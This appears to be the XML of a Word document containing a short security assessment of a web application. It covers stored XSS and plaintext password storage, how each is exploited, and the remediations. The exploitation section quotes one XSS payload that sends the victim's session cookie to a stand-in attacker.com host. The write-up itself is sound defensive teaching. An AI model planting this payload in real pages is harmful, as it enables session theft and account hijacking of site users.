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7B3FA" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>(a) Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F061FF" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>1. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC6E39" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="624D3A7A" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>The application displays user-submitted comments directly within web pages without properly sanitizing or encoding the content. As a result, malicious users can inject JavaScript code that executes in the browsers of other users who view the affected page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C935E2" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="0D24F798" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>2. Insecure Password Storage (Plaintext Password Storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B498D" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="23817D11" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>The application stores user passwords in plaintext within the database. This practice creates a significant security risk because anyone who gains unauthorized access to the database can immediately view and misuse all user credentials without requiring additional effort to decrypt or crack them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A7BCA8" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="72FD5DCF" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>(b) Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04B3CC" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>XSS Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3872A500" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="2130CFA3" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>An attacker can submit a comment containing malicious JavaScript code, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A6380" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="05E803B0" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E236C7" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='http://attacker.com/steal?cookie='+document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C40D7" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B305C0E" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="09489148" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="3FFA24F0" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t xml:space="preserve">When another user visits the page containing the malicious comment, the browser executes the embedded script. This allows the attacker to steal session cookies, hijack authenticated sessions, redirect users to phishing websites, capture keystrokes, display fake login forms, or perform unauthorized actions on behalf of the victim. Because the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>script executes within the trusted context of the legitimate website, it can bypass browser-based same-origin protections and compromise user security without their awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67E459" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="7EB03060" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Plaintext Password Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CD16E" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="603B3ADB" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>If an attacker obtains access to the database through methods such as SQL injection, server misconfiguration, insider misuse, or a data breach, all stored passwords become immediately readable. Since the passwords are not hashed or encrypted, no password-cracking effort is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DD1DA" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="5378806B" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>This vulnerability is particularly dangerous because many users reuse passwords across multiple online services. Consequently, a breach of a single application may lead to unauthorized access to email accounts, financial services, and other personal or business systems. Attackers can also leverage the exposed credentials to conduct large-scale credential stuffing attacks against additional websites and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E37C1C" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="421D25F3" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>(c) Technical Fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345A4B4" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>XSS Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC8DE4" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="2F6C5173" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>To protect against Cross-Site Scripting attacks, the application should implement the following controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D78A6" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="0D8A6A46" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Input Validation and Output Encoding: Validate user input and encode output before displaying it in the browser. For example, convert special characters such as &lt; and &gt; into their HTML entity equivalents (&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; and &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;) to prevent malicious code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121BBD79" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Content Security Policy (CSP): Configure CSP headers to restrict the execution of unauthorized scripts and block inline JavaScript whenever possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D408DB8" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Secure Frameworks: Utilize frameworks with built-in XSS defenses, such as React, which automatically escapes rendered content, or Django, whose templating engine performs output escaping by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40899F9D" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HTML Sanitization: When rich HTML content must be accepted from users, sanitize it using trusted libraries such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to remove dangerous elements and attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD26B8" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Password Security Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45835522" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="5A65CF98" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>To securely manage user credentials, the following best practices should be adopted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9D6AF" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6"/>
    <w:p w14:paraId="560DB098" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Avoid Plaintext Storage: Never store passwords in plaintext format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C99D3" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t xml:space="preserve">Use Strong Password Hashing Algorithms: Store passwords using modern adaptive hashing algorithms such as Argon2 (recommended), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, or PBKDF2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE60EFE" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Implement Unique Salts: Generate and store a unique cryptographic salt for each user account to protect against rainbow table attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9E9DC" w14:textId="77777777" w:rsidR="006B02A6" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Adjust Work Factors: Periodically increase hashing cost parameters as computing power advances to maintain resistance against brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E37FB" w14:textId="6BED709D" w:rsidR="000D4926" w:rsidRDefault="006B02A6" w:rsidP="006B02A6">
      <w:r>
        <w:t>Hash During Authentication: During login, hash the submitted password and compare it with the stored hash rather than comparing plaintext values.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000D4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2A6"/>
    <w:rsid w:val="000D4926"/>
    <w:rsid w:val="00474B69"/>
    <w:rsid w:val="006B02A6"/>
    <w:rsid w:val="00AC4986"/>
    <w:rsid w:val="00DC2D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ED217"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{36F38668-243D-4FBE-8A5C-936FCD6D2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2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02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02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2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2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2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02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02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2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2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2A6"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006B0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2A6"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006B02A6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006B02A6"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006B02A6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006B02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2A6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="006B02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570</Words>
  <Characters>3252</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Zili Hu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zili Hu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-04T03:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-04T03:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>